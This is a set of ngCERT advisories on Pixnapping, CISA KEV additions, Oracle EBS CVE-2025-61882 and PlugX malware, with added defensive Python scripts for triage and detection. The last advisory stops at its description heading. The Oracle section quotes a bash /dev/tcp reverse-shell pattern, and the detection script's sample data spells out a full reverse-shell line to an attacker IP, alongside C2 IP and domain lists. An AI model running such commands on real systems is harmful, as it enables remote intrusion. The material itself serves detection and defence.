Advisory ID: ngCERT-2025-100006
SUMMARY
ngCERT warns of Pixnapping, a newly disclosed attack that lets a malicious Android app covertly steal sensitive on-screen data, such as two-factor authentication (2FA) codes, messages and emails, within seconds. The malicious app is typically installed after a phishing lure and then abuses Android APIs together with a hardware side channel in GPU rendering that affects nearly all modern Android devices running versions 13 to 16. Attackers target banking, cryptocurrency and social media accounts for data exfiltration, account takeover and financial and privacy loss. Organisations and individuals who use Android devices for sensitive communications, or who rely on 2FA codes that are displayed on the screen (SMS or authenticator apps), are at high risk. Immediate action, including updating and vetting apps, restricting permissions and adopting 2FA methods that do not display a code, is critical to mitigate the threat.
Damage: Critical
Probability: High
Platform(s): Android 13-16 mobile devices (demonstrated on Google Pixel phones and the Samsung Galaxy S25); apps that display 2FA codes (SMS or authenticator apps); messaging and email apps
DESCRIPTION
Pixnapping is an attack that lets a malicious Android app steal sensitive information, such as two-factor authentication (2FA) codes and private messages, by inferring what is displayed on the screen. The malicious app, disguised as a legitimate app and installed by the victim after a phishing lure, uses Android intents to launch a target app such as Google Authenticator or a messaging app so that the sensitive content is rendered on screen. It then stacks semi-transparent activities over that content and applies graphical operations (such as blur) to chosen pixels. Because the time the hardware takes to render a frame depends on the colour of the pixels involved, the app can measure frame timing through the normal Android rendering (VSync) callbacks and recover the target pixels one by one, and from them the displayed text or digits. No permissions are requested, which makes the app hard to spot, and a 2FA code can be harvested in seconds. The attack works across the normal app sandbox, so its only prerequisite is that the malicious app is installed, typically from an untrustworthy source outside Google Play. The underlying side-channel information disclosure in Android is tracked as CVE-2025-48561; it has been partially fixed, and a complete patch is expected in December 2025.
INDICATORS OF COMPROMISE
The following are observed Indicators of Compromise (IoCs):
1. Unpatched Devices: Android 13-16 devices that have not received the fix for CVE-2025-48561 (check the security patch level under Settings).
2. Suspicious Apps: Third-party apps that declare no permissions yet draw overlays, use translucent activities or apply blur effects.
3. Behavioural Anomalies: Unusual rendering delays, semi-transparent overlays, or repeated app invocations.
4. Activity Patterns: Unusual Intent invocations that repeatedly bring a specific app to the foreground, or tight loops of VSync/frame-timing measurements in an app process.
5. App Enumeration: Unauthorised detection of installed apps like Authenticator or messaging tools.
6. Device-Specific Signs: Performance issues on Pixel/Samsung devices during sensitive app usage.
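As a triage aid for the "suspicious apps" indicator above, the following Python script is an added example (not part of this advisory and not a Google or research tool). It parses the text produced by adb shell dumpsys package packages on a connected handset and lists third-party apps that request no permissions at all and were not installed from Google Play. The dumpsys excerpt embedded below is constructed for the example; the layout it assumes (the Package [...] header, the requested permissions: block, and the installerPackageName= and flags=/pkgFlags= lines) follows what recent Android builds print but varies across versions, and a hit is a lead for manual review, not proof of Pixnapping.

```python
import re
from dataclasses import dataclass, field

PLAY_STORE = "com.android.vending"  # installerPackageName recorded for Google Play installs


@dataclass
class PackageInfo:
    name: str
    installer: str = "null"          # dumpsys prints 'null' when no installer is recorded
    system: bool = False
    requested: list = field(default_factory=list)


def parse_dumpsys_packages(text: str) -> list:
    """Parse 'adb shell dumpsys package packages' output into PackageInfo records.

    Assumed layout: each app starts with a 'Package [<name>] (<hash>):' line;
    'requested permissions:' is followed by more-indented entries, some of which
    carry a ': restricted=true' suffix on newer builds.
    """
    pkgs: list = []
    cur = None
    header_indent = None  # indent of 'requested permissions:' while collecting entries
    for line in text.splitlines():
        stripped = line.strip()
        indent = len(line) - len(line.lstrip(" "))
        m = re.match(r"Package \[([\w.]+)\]", stripped)
        if m:
            cur = PackageInfo(name=m.group(1))
            pkgs.append(cur)
            header_indent = None
            continue
        if cur is None:
            continue
        if header_indent is not None:
            if stripped and indent > header_indent:
                cur.requested.append(stripped.split(":", 1)[0])
                continue
            header_indent = None  # left the 'requested permissions:' block
        if stripped == "requested permissions:":
            header_indent = indent
        elif stripped.startswith("installerPackageName="):
            cur.installer = stripped.split("=", 1)[1]
        elif stripped.startswith(("flags=", "pkgFlags=")) and "SYSTEM" in stripped:
            cur.system = True
    return pkgs


def suspicious_packages(pkgs) -> list:
    """Third-party apps that request no permissions and did not come from Google Play.

    Pixnapping needs no permissions, so this is a lead for manual review, not proof.
    """
    return [p.name for p in pkgs
            if not p.system and not p.requested and p.installer != PLAY_STORE]


# Constructed dumpsys excerpt for the example (package names are made up).
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.android.settings] (1a2b3c):
    userId=1000
    flags=[ SYSTEM HAS_CODE ]
    requested permissions:
      android.permission.INTERNET
  Package [com.example.weather] (4d5e6f):
    userId=10201
    installerPackageName=com.android.vending
    flags=[ HAS_CODE ALLOW_BACKUP ]
    requested permissions:
      android.permission.INTERNET
      android.permission.ACCESS_COARSE_LOCATION: restricted=true
    install permissions:
      android.permission.INTERNET: granted=true
  Package [com.example.freewallpaper] (7a8b9c):
    userId=10202
    installerPackageName=null
    flags=[ HAS_CODE ]
    User 0: installed=true hidden=false
"""

if __name__ == "__main__":
    for name in suspicious_packages(parse_dumpsys_packages(SAMPLE_DUMPSYS)):
        print("review:", name)
```

Save a real dump with adb shell dumpsys package packages > dump.txt and pass its contents to parse_dumpsys_packages; as written the script runs offline on the embedded sample and reports com.example.freewallpaper.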
CONSEQUENCES
Successful Pixnapping exploitation can result in:
- Sensitive Data Theft: Extraction of 2FA codes, private messages, emails, and location data, leading to account takeovers.
- Financial and Privacy Losses: Unauthorised access to banking or payment apps (e.g., Venmo), enabling fraud or blackmail.
- User Profiling: Detection of installed apps without permissions, aiding targeted attacks or surveillance.
- Delayed Detection: The malicious app runs silently and requests no permissions, so there is no prompt to alert the user; the partial patch has already been bypassed, prolonging exposure until the complete fix ships.
- Broader Impacts: Compromise of corporate or personal accounts; the attack recovers a 2FA code in roughly 14-25 seconds on Pixel devices, fast enough to use a time-limited code before it expires.
SOLUTION/MITIGATION
ngCERT recommends the following to defend against Pixnapping:
- Patch Management: Apply Android security updates immediately; the September 2025 update contains the partial mitigation, and the complete fix expected in December 2025 should be applied as soon as it ships.
- App Installation Practices: Download apps only from Google Play; avoid side-loading or third-party sources.
- 2FA Enhancements: Prefer hardware security keys or passkeys (FIDO2/WebAuthn, e.g., YubiKey), which never display a code on the screen. Note that Pixnapping reads whatever is rendered, so authenticator apps that show a time-based code (e.g., Google Authenticator, Authy) are themselves targets; moving from SMS to an authenticator app does not remove this risk.
- Device Hardening: Keep Google Play Protect enabled, review and remove unneeded apps, and use a mobile security product with behavioural analysis. Pixnapping apps need no permissions, so reviewing granted permissions alone will not reveal them.
- Monitoring: Look for unusual Intent invocations, overlay activity or repeated foregrounding of authenticator and messaging apps; employ mobile threat detection tools.
- Developer Guidance: Limit what sensitive data is displayed and for how long; no app-level fix is available yet, so monitor Google's Android security bulletins.
- Awareness: Educate users on phishing risks leading to malicious app installs.
HYPERLINK
Advisory ID: NCC-CSIRT-2025-020
Summary:
CISA has added five newly exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalogue, confirming real-world attacks against major software products, including Oracle E-Business Suite (EBS) and Microsoft Windows. The new entries are:
- A server-side request forgery (SSRF) issue (CVE-2025-61884) in Oracle EBS that can be triggered without authentication. It joins the Oracle EBS remote code execution vulnerability (CVE-2025-61882), which CISA had already listed and which is being actively exploited.
- A Microsoft Windows SMB Client privilege escalation flaw (CVE-2025-33073).
- Authentication bypass vulnerabilities in Kentico Xperience CMS (CVE-2025-2746 & CVE-2025-2747) enabling administrative control.
- An Apple JavaScriptCore arbitrary code execution flaw (CVE-2022-48503) affecting web content processing.
CISA has set a remediation deadline of November 10, 2025, for federal agencies.
Damage/Probability: Critical/High
Product(s):
- Oracle E-Business Suite (EBS): Oracle Configurator (Runtime UI) for CVE-2025-61884; Concurrent Processing (BI Publisher Integration) for CVE-2025-61882
- Microsoft Windows SMB Client
- Kentico Xperience CMS
- Apple JavaScriptCore
Version(s):
- Oracle EBS: CVE-2025-61884 (SSRF) and CVE-2025-61882 (RCE); the RCE affects EBS 12.2.3 through 12.2.14 (see ngCERT-2025-100005)
- Microsoft Windows SMB Client: CVE-2025-33073 (improper access control leading to elevation of privilege)
- Kentico Xperience CMS: CVE-2025-2746 & CVE-2025-2747 (authentication bypass)
- Apple JavaScriptCore: CVE-2022-48503 (improper array-index validation)
Platform(s):
Enterprise ERP systems, Windows client environments, CMS web platforms, Apple/macOS devices using WebKit/JavaScriptCore.
Description:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalogue, confirming real-world attacks targeting major enterprise and consumer technologies from Oracle, Microsoft, Kentico, and Apple.
Two of the vulnerabilities affect Oracle E-Business Suite (EBS). The SSRF flaw (CVE-2025-61884) resides in the Runtime UI of the Oracle Configurator component and allows an unauthenticated attacker with HTTP access to make the server issue requests on the attacker's behalf, reaching internal services, databases or cloud resources and exposing their data. The RCE flaw (CVE-2025-61882) sits in the BI Publisher Integration of Oracle Concurrent Processing and allows an unauthenticated attacker to execute arbitrary code on the application tier (see ngCERT-2025-100005). Exploitation of both has been observed in the wild, with threat actors using them for data exfiltration and lateral movement within enterprise networks.
The third flaw, CVE-2025-33073, is an improper access control weakness in the Microsoft Windows SMB Client that lets an authenticated attacker elevate privileges over the network: a host that can be induced to authenticate to an attacker-controlled SMB server can have that authentication relayed back to it, yielding SYSTEM-level access. This is particularly concerning in environments that do not enforce SMB signing or lack network segmentation, as attackers can use it to gain elevated rights and persistence.
Two additional vulnerabilities, CVE-2025-2746 and CVE-2025-2747, affect Kentico Xperience CMS. They stem from improper handling of authentication requests in the staging synchronization component, allowing unauthenticated users to bypass login controls and gain administrative access to web servers. Once exploited, attackers can modify website content, deploy web shells, or redirect users to malicious domains.
Lastly, CVE-2022-48503, a vulnerability in Apple’s JavaScriptCore (used in WebKit-based browsers), results from improper validation of array indices. This flaw allows attackers to execute arbitrary code on macOS and iOS devices when victims visit malicious or compromised websites. Although initially disclosed in 2022, it remains under active exploitation, highlighting how older vulnerabilities continue to be leveraged against unpatched systems.
CISA’s analysis confirms that these vulnerabilities are being actively exploited in the wild, and federal agencies have been mandated to patch affected systems by 10 November 2025. Organizations are strongly advised to prioritize remediation, implement network segmentation where patching cannot be done immediately, and monitor for signs of compromise, particularly unusual HTTP requests, unauthorized administrative access, or suspicious privilege escalation activities.
Impacts:
- Unauthorized access to enterprise resources via Oracle EBS SSRF or RCE leading to data exfiltration or lateral movement.
- Compromise of Windows clients via SMB Client privilege escalation, enabling attackers to gain elevated rights and persist.
- Administrative takeover of web content and infrastructure via Kentico CMS authentication bypass, enabling further malware deployment or defacement.
- Exploitation of macOS/iOS devices via Apple JavaScriptCore flaw, enabling arbitrary code execution through web content, risking endpoint compromise in enterprise “bring your own device” (BYOD) contexts.
- High risk for organisations that delayed or skipped patching: attackers typically move quickly once a CVE is public and listed in CISA's KEV Catalogue.
Solutions:
- Prioritise Patching: Immediately apply vendor patches for the listed CVEs: Oracle EBS, Microsoft Windows (SMB Client), Kentico CMS, Apple devices.
- Confirm Asset Inventory: Ensure you know whether you run affected versions of Oracle EBS, Windows SMB Client endpoints, Kentico CMS installations, or macOS/iOS devices vulnerable to JavaScriptCore exploits.
- Isolate & Segment: Until patched, segregate vulnerable systems, especially Oracle EBS and CMS platforms, with stricter network segmentation and restricted access.
- Harden Configurations: For Windows, require SMB signing on both clients and servers (which blocks the relay behind CVE-2025-33073), disable SMBv1, and monitor for unusual local privilege escalation. For Kentico, disable the Staging Sync Server if it is not used and review the authentication flow of any exposed web services.
- Monitor Logs & Network: Look for abnormal HTTP requests from Oracle servers to internal services (SSRF), sudden administrative logins in CMS, privilege escalation events in Windows, or unusual web content processing on Apple devices.
- Validate Remediation: After patching, run vulnerability scans and penetration tests focusing on these CVEs; verify no persistence or backdoor remains.
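The "Confirm Asset Inventory" and "Prioritise Patching" steps can be automated against the KEV feed itself. The Python below is an added example, not from CISA or this advisory: it reads KEV entries in the layout of CISA's published JSON feed (the cveID, vendorProject, product, dueDate and knownRansomwareCampaignUse fields), cross-references them with a simple asset inventory, and orders the work by due date with ransomware-linked entries first. The feed excerpt and inventory are constructed; the 10 November 2025 due date is the one quoted above, the other dates are illustrative, and the "Multiple Products" case shows why a vendor-only match still needs a human to confirm the exact product.

```python
import json
from datetime import date

# Constructed excerpt in the layout of CISA's KEV JSON feed (field names as published;
# dueDate 2025-11-10 is the deadline quoted above, the other dates are illustrative).
KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2025-61882", "vendorProject": "Oracle", "product": "E-Business Suite",
     "dateAdded": "2025-10-06", "dueDate": "2025-10-27", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2025-61884", "vendorProject": "Oracle", "product": "E-Business Suite",
     "dateAdded": "2025-10-20", "dueDate": "2025-11-10", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-33073", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-10-20", "dueDate": "2025-11-10", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-2746", "vendorProject": "Kentico", "product": "Xperience",
     "dateAdded": "2025-10-20", "dueDate": "2025-11-10", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-2747", "vendorProject": "Kentico", "product": "Xperience",
     "dateAdded": "2025-10-20", "dueDate": "2025-11-10", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2022-48503", "vendorProject": "Apple", "product": "Multiple Products",
     "dateAdded": "2025-10-20", "dueDate": "2025-11-10", "knownRansomwareCampaignUse": "Unknown"},
]})

# Constructed asset inventory; one row per product installation.
INVENTORY = [
    {"asset": "erp-prod-01", "vendor": "Oracle", "product": "E-Business Suite"},
    {"asset": "www-cms-02", "vendor": "Kentico", "product": "Xperience"},
    {"asset": "laptop-fleet", "vendor": "Microsoft", "product": "Windows 11"},
    {"asset": "build-mac-03", "vendor": "Apple", "product": "macOS"},
    {"asset": "hr-db-04", "vendor": "PostgreSQL", "product": "PostgreSQL"},
]


def load_kev(text: str) -> list:
    return json.loads(text)["vulnerabilities"]


def match_kind(entry: dict, asset: dict):
    """'exact' on a vendor+product name match, 'vendor-only' when KEV lumps a vendor's
    products together (e.g. Apple 'Multiple Products'), otherwise None."""
    if entry["vendorProject"].lower() != asset["vendor"].lower():
        return None
    kev_product, our_product = entry["product"].lower(), asset["product"].lower()
    if kev_product == "multiple products":
        return "vendor-only"
    if kev_product in our_product or our_product in kev_product:
        return "exact"
    return None


def prioritise(kev: list, inventory: list, today: date) -> list:
    """One row per matching (KEV entry, asset) pair, earliest due date first and
    ransomware-linked entries ahead of the others on the same date."""
    rows = []
    for entry in kev:
        for asset in inventory:
            kind = match_kind(entry, asset)
            if kind is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            rows.append({
                "cve": entry["cveID"],
                "asset": asset["asset"],
                "match": kind,
                "due": entry["dueDate"],
                "days_left": (due - today).days,
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    rows.sort(key=lambda r: (r["due"], not r["ransomware"], r["cve"]))
    return rows


def example_rows() -> list:
    """The sample run: KEV excerpt against the inventory as of 21 October 2025."""
    return prioritise(load_kev(KEV_SAMPLE), INVENTORY, date(2025, 10, 21))


if __name__ == "__main__":
    for r in example_rows():
        flag = " RANSOMWARE" if r["ransomware"] else ""
        print(f'{r["cve"]:16} {r["asset"]:14} due {r["due"]} ({r["days_left"]:>3}d) {r["match"]}{flag}')
```

In practice, replace KEV_SAMPLE with the live feed and the inventory with your CMDB export; the ordering puts the Cl0p-linked Oracle RCE at the top and surfaces the Apple entry as "vendor-only" so someone checks which Apple devices actually run the affected WebKit build.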
References:
Advisory ID: ngCERT-2025-100005
SUMMARY
ngCERT has detected a critical and easily exploitable vulnerability affecting Oracle E-Business Suite (EBS) deployments in Nigeria. The vulnerability, assigned CVE-2025-61882, can be exploited remotely by an unauthenticated attacker with HTTP network access to achieve remote code execution (RCE), potentially leading to full system takeover. Rated CVSS 3.1 base score 9.8 (Critical), the flaw has been actively exploited in the wild by the Cl0p ransomware group and has therefore been added to CISA's Known Exploited Vulnerabilities (KEV) Catalogue. Organisations must urgently apply the available patches to safeguard against exploitation and possible cyberattacks.
Damage: Critical (CVSS 3.1 Base Score 9.8)
Probability: High
Platform(s): Oracle e-Business Suite
DESCRIPTION
CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle EBS versions 12.2.3 through 12.2.14. It arises from a chain of exploitable weaknesses: inconsistent HTTP request parsing, path traversal, improper neutralisation of CRLF sequences, XML external entity (XXE) reference issues, XML injection and server-side request forgery (SSRF). An unauthenticated attacker with HTTP network access sends crafted requests that exploit these flaws in sequence. The chain starts by using the inconsistent request parsing and path traversal to reach server resources that should be restricted. Crafted XML payloads then exploit the XXE and XML injection weaknesses to manipulate server-side processing, CRLF injection adds attacker-controlled headers, and SSRF makes the server issue requests of the attacker's choosing. The chain culminates in RCE, allowing arbitrary commands to be executed on the server without authentication.
CONSEQUENCES
Successful exploitation of these flaws could result in:
- Full System Compromise: Unauthenticated attackers can achieve remote code execution (RCE), gaining complete control over the Oracle E-Business Suite (EBS) instance.
- Data Exfiltration: Sensitive business data, including financial and customer information, can be stolen, leading to severe privacy and intellectual property breaches.
- Ransomware Deployment: Exploitation by groups like Cl0p enables ransomware attacks, causing data encryption and operational paralysis.
- Confidentiality and Integrity Loss: Full exposure and modification of sensitive data, undermining system trustworthiness and business operations.
- Service Disruption: Denial of service can halt critical EBS functions, leading to significant operational downtime.
SOLUTION/MITIGATION
To mitigate these vulnerabilities, ngCERT recommends the following measures:
- Apply Security Patches: Immediately install patches for Oracle E-Business Suite versions 12.2.3–12.2.14 as specified in Oracle’s patch availability document (Note 3106344.1 on My Oracle Support). Ensure the October 2023 Critical Patch Update (CPU) is applied as a prerequisite.
- Restrict Network Access: Limit HTTP access to the BI Publisher Integration component to trusted IP ranges using firewall rules or web application firewalls (WAF) to block malicious requests.
- Monitor and Detect: Actively monitor logs for the indicators of compromise (IoCs) published with Oracle's alert, such as the IP addresses 200.107.207.26 and 185.181.60.11, reverse-shell command lines of the form sh -c /bin/bash -i >& /dev/tcp/ / 0>&1 (with the attacker's IP and port in the blanks), and the file hash SHA-256 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d.
- Upgrade EBS Versions: Migrate to supported EBS versions under Premier or Extended Support to ensure patch availability and enhanced security.
- Disable Unnecessary Features: Deactivate non-essential Concurrent Processing features to reduce the attack surface.
- Interim Isolation: If patching is delayed, isolate the EBS environment from untrusted networks and enhance logging to detect exploitation attempts.
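To act on the "Monitor and Detect" step, the Python below is an added example (not Oracle's or ngCERT's tooling) that checks three kinds of evidence against the IoCs quoted above: web-server access-log lines for requests from the listed IP addresses, process command lines (for instance from ps -eo args or auditd EXECVE records on the application tier) for the /dev/tcp reverse-shell pattern, and file contents for the listed SHA-256. The log lines, command lines and file contents embedded below are constructed; the access-log parser assumes the Apache/NCSA combined format, and the reverse-shell regex only covers the bash /dev/tcp form quoted in the advisory, so treat it as a starting point rather than a complete signature.

```python
import hashlib
import re

# IoCs quoted in this advisory
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {"76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"}
# Reverse shell of the shape quoted above, with the attacker IP and port captured
REVERSE_SHELL_RE = re.compile(r"/bin/(?:ba)?sh\s+-i\s*>&\s*/dev/tcp/([\d.]+)/(\d+)\s+0>&1")
# Apache/NCSA combined log format: client ip, ident, user, [timestamp], "request line"
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')


def scan_access_log(lines):
    """(client_ip, request_line) for every request that came from a listed IP."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m.group(1) in IOC_IPS:
            hits.append((m.group(1), m.group(2)))
    return hits


def scan_commands(cmdlines):
    """(ip, port, cmdline) for command lines that spawn a /dev/tcp reverse shell."""
    hits = []
    for cmd in cmdlines:
        m = REVERSE_SHELL_RE.search(cmd)
        if m:
            hits.append((m.group(1), int(m.group(2)), cmd))
    return hits


def scan_files(files):
    """files: {path: bytes}. Paths whose SHA-256 matches a listed hash."""
    return [p for p, data in files.items() if hashlib.sha256(data).hexdigest() in IOC_SHA256]


# Constructed sample data (paths, timestamps and the Java command line are made up)
ACCESS_LOG = [
    '10.1.4.22 - - [10/Oct/2025:09:12:01 +0100] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5123',
    '200.107.207.26 - - [10/Oct/2025:09:13:44 +0100] "POST /OA_HTML/ HTTP/1.1" 200 311',
    '10.1.4.23 - - [10/Oct/2025:09:14:09 +0100] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0',
]
CMDLINES = [  # e.g. from 'ps -eo args' or auditd EXECVE records on the application tier
    "/usr/bin/java -server -Xmx1024m com.example.ConcurrentManager",
    "sh -c /bin/bash -i >& /dev/tcp/185.181.60.11/443 0>&1",
]
SAMPLE_FILES = {"/tmp/upload.bin": b"constructed sample content, not the real artefact"}

if __name__ == "__main__":
    print("access log:", scan_access_log(ACCESS_LOG))
    print("commands:  ", scan_commands(CMDLINES))
    print("files:     ", scan_files(SAMPLE_FILES))
```

On a real host, feed scan_access_log the web tier's access logs, scan_commands the output of ps -eo args or the EXECVE records from auditd, and scan_files the bytes of any unexpected files under the EBS temp and upload directories; a command-line hit gives you the attacker's IP and port for immediate egress blocking.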
HYPERLINK
- https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-61882
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
- https://www.hipaajournal.com/cl0p-mass-exploiting-zero-day-vulnerability-oracle-e-business-suite/
- https://www.ncsc.gov.uk/news/active-exploitation-vulnerability-affecting-oracle-ebusiness-suite
Advisory ID: ngCERT-2025-100004
SUMMARY
ngCERT's attention has been drawn to the resurgence of SOGU, also known as PlugX, a malware family that poses a significant threat to Nigeria's cyberspace. It is a sophisticated modular Remote Access Trojan (RAT) deployed by Advanced Persistent Threat (APT) actors in cyber-espionage campaigns. Current reports show these attacks targeting critical infrastructure across multiple sectors, including telecommunications companies. SOGU operates as a backdoor with keylogging, surveillance, data exfiltration and stealth capabilities, disguising itself as legitimate applications to avoid detection. New variants add remote code execution, gain persistence through Dynamic Link Library (DLL) side-loading and implement new command-and-control (C2) command identifiers. Compromise of critical infrastructure by this malware could result in privacy and data breaches, supply chain risks, financial losses, reputational damage and possibly geopolitical consequences. Public and private sector organisations therefore need to put robust defences in place to mitigate the threat posed by PlugX.
Damage: Critical
Probability: High
Platform(s): Microsoft Windows hosts (DLL side-loading), network edge devices (firewalls, VPN appliances) and IoT devices
DESCRIPTION
The recent PlugX campaigns have targeted critical infrastructure, particularly telecommunications networks, and rely on DLL side-loading for espionage. For initial access, the attackers abuse legitimate executables, such as the one from Quick Heal's Mobile Popup Application, to trigger DLL search-order hijacking so that the executable loads a malicious DLL placed beside it. New variants have also gained initial access by exploiting vulnerabilities in edge devices such as firewalls and VPN appliances, and possibly weaknesses in IoT devices. To deploy the payload, the malicious DLL decrypts PlugX (or related implants such as RainyDay or Turian) with RC4 (Rivest Cipher 4, a symmetric stream cipher) and loads it directly into memory, so the plaintext implant never touches disk and evades file-based detection; the loader and encryption routine are shared across these families. The malware also employs control-flow flattening, API hashing and an embedded keylogger to obscure its operation and resist reverse engineering. Once resident, PlugX establishes long-term command-and-control access, enabling arbitrary command execution, file upload and download, and keylogging for credential theft and lateral movement within the network. Compromised systems are then used to steal sensitive data, such as communications metadata, in support of broader cyber-espionage against critical sectors.
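One way to hunt for the DLL side-loading described above is to score module-load telemetry. The Python below is an added example, not part of the advisory or of any vendor product: it takes records in the shape of Sysmon Event ID 7 (Image loaded), using the Image, ImageLoaded, Signed, SignatureStatus and OriginalFileName fields Sysmon emits for the loaded DLL, and flags loads where a DLL is resolved from the executable's own user-writable directory, is unsigned, or carries version information naming a different file. The records, weights and threshold are constructed and illustrative; tune them to your environment.

```python
import ntpath

# Directories where loading a DLL from the executable's own folder is normal.
STANDARD_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Locations a low-privileged user (or a phishing payload) can write to.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")
ALERT_THRESHOLD = 4  # illustrative; scores are the sum of the weights below


def sideload_score(ev: dict):
    """Score one Sysmon Event ID 7 (Image loaded) record; higher means more like side-loading.

    Assumed field names (Sysmon's): Image is the process, ImageLoaded the DLL, and
    Signed / SignatureStatus / OriginalFileName describe the loaded DLL.
    """
    exe = ev["Image"].lower()
    dll = ev["ImageLoaded"].lower()
    reasons = []
    if not dll.endswith(".dll"):
        return 0, []
    if ntpath.dirname(exe) == ntpath.dirname(dll) and not dll.startswith(STANDARD_DIRS):
        reasons.append((2, "DLL resolved from the executable's own directory outside Windows/Program Files"))
    if dll.startswith(USER_WRITABLE):
        reasons.append((1, "DLL lives under a user-writable path"))
    if ev.get("Signed", "false").lower() != "true" or ev.get("SignatureStatus") != "Valid":
        reasons.append((2, "DLL is unsigned or its signature is not valid"))
    orig = ev.get("OriginalFileName", "-")
    if orig not in ("-", "") and orig.lower() != ntpath.basename(dll):
        reasons.append((2, f"version info names the file {orig!r}, not {ntpath.basename(dll)!r}"))
    return sum(w for w, _ in reasons), [text for _, text in reasons]


def find_sideloads(events, threshold: int = ALERT_THRESHOLD):
    """(process image, DLL, score, reasons) for events scoring at or above the threshold."""
    out = []
    for ev in events:
        score, reasons = sideload_score(ev)
        if score >= threshold:
            out.append((ev["Image"], ev["ImageLoaded"], score, reasons))
    return out


# Constructed records in the shape of Sysmon Event ID 7 (paths and names are made up).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "ImageLoaded": r"C:\Windows\System32\rpcrt4.dll",
     "Signed": "true", "SignatureStatus": "Valid", "OriginalFileName": "rpcrt4.dll"},
    {"Image": r"C:\Users\Public\Libraries\popup\vendorpopup.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\popup\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "OriginalFileName": "-"},
    {"Image": r"C:\Program Files\SomeTool\tool.exe", "ImageLoaded": r"C:\Program Files\SomeTool\plugin.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "OriginalFileName": "plugin.dll"},
]

if __name__ == "__main__":
    for image, dll, score, reasons in find_sideloads(SAMPLE_EVENTS):
        print(f"{score}: {image} loaded {dll}")
        for r in reasons:
            print("   -", r)
```

The second record (a signed-looking vendor executable in a user-writable folder loading an unsigned DLL beside it) scores 5 and is reported; the unsigned plugin under Program Files scores 2 and is not, which is the trade-off to revisit if your estate has many unsigned in-house tools.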
INDICATORS OF COMPROMISE
The following are observed Indicators of Compromise (IoCs):
1. Domains
a) [.]relivonline[.]com
b) [.]im0[.]site
c) [.]frillsforspills[.]com
d) [.]365safemail[.]com
2. IPs with Ports
a) 103[.]79[.]120[.]85:443
b) 103[.]79[.]120[.]92:443
c) 103[.]79[.]120[.]71:443
d) 103[.]79[.]120[.]71:5000
e) 103[.]107[.]104[.]61:443
f) 103[.]107[.]104[.]61:5000
g) 39[.]105[.]24[.]38:3478
h) 39[.]105[.]24[.]38:443
i) 121[.]201[.]74[.]246:5000
j) 69[.]172[.]75[.]148:5000
k) 154[.]90[.]47[.]123:443
l) 154[.]90[.]47[.]123:5000
m) 45[.]128[.]153[.]73:443
CONSEQUENCES
SOGU aka PlugX malware attacks could result in:
- Extensive data exfiltration and espionage.
- Compromise of networks in critical sectors like telecom that can act as vectors for supply chain attacks.
- Economic and financial losses.
- Breaches that could further result in reputational damage, customer trust erosion, regulatory fines, and legal scrutiny.
- Operational disruptions and Denial of Service (DoS) attacks.
SOLUTION/MITIGATION
ngCERT recommends that organisations:
- Conduct regular security awareness training to help users recognize phishing attempts.
- Implement advanced email filtering solutions to block malicious emails before reaching end-users.
- Deploy and maintain up-to-date antivirus solutions capable of detecting PlugX signatures and behaviors.
- Enforce 2FA to protect access to sensitive systems and applications.
- Conduct regular analysis of system and network logs to identify anomalies related to PlugX behavior.
- Ensure the prompt application of patches and updates to all software to minimise exploitation opportunities.
- Filter network traffic by preventing unknown or untrusted access to remote services on internal systems.
- Review domain controllers, servers, workstations and Active Directory for new or unrecognised accounts.
HYPERLINK
- https://cybersecsentinel.com/the-return-of-plugx-malware-with-fresh-tricks/
- https://thehackernews.com/2025/09/china-linked-plugx-and-bookworm-malware.html
- https://security.googlecloudcommunity.com/community-blog-42/finding-malware-detecting-sogu-with-google-security-operations-3869
- https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx
Advisory ID: ngCERT-2025-100003
SUMMARY
ngCERT is aware of LockerGoga, MegaCortex and Nefilim, sophisticated ransomware families active between 2019 and 2021 and linked to a threat actor identified as deadforz, who also used the aliases "Boba", "msfv" and "farnetwork". These strains targeted critical infrastructure, manufacturing, healthcare and transportation organisations in several countries, causing losses running into millions of US dollars. Organisations should review their systems for the indicators of compromise (IoCs) below and strengthen defences against affiliate-driven attacks that reuse the same tradecraft.
Damage: Critical
Probability: High
Platform(s): Microsoft Windows
DESCRIPTION
